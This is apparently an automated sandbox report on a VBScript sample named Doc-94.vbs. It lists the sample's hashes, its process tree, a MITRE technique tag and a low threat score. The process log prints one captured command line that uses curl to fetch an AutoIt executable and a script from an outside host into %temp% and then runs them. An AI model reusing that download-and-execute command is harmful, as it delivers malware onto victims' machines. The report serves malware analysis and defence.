bf2a69d4728af507440925f462a41bac0529dd70eec76ff8b5988bf510bea8ef

Analysis

max time kernel
118s
max time network
121s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
13-10-2023 13:11

Target

Doc-94.vbs
Size

25KB
MD5

d050315ff65ebef0ba1352167126592f
SHA1

e2009bb0ccae9b82d57c45d7b6c39d76faded05d
SHA256

1e8a6d34c0fe5a5ad2fc1d6ff7000bcf8efa0704c397cb6ef021c2692bf17fe6
SHA512

e5e50b1ab9e4d939d401225daaa98cdcd5696813aae91538f911202982b2937229faa358f5a8ba4094c2c5121e0e236ad00f857a36b91891f10061dbc08c1b46
SSDEEP

768:3IvITQgdN5RyiUiK3IfJO37NwNGFFNWePDUirUif3IhBN67e:3IvI8/e

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 1876 wrote to memory of 2432	1876	WScript.exe	cmd.exe
PID 1876 wrote to memory of 2432	1876	WScript.exe	cmd.exe
PID 1876 wrote to memory of 2432	1876	WScript.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Doc-94.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1876

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" f InStr(1, WScript.ScriptFullName,"vbs", 1) > 0 Then:path = WScript.ScriptFullName:end if '/c cd /d %temp% & curl -o Autoit3.exe http://whoernet.co.com:80 & curl -o dftxsm.au3 http://whoernet.co.com:80/msifvwjscyk & Autoit3.exe dftxsm.au3
2⤵
PID:2432

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance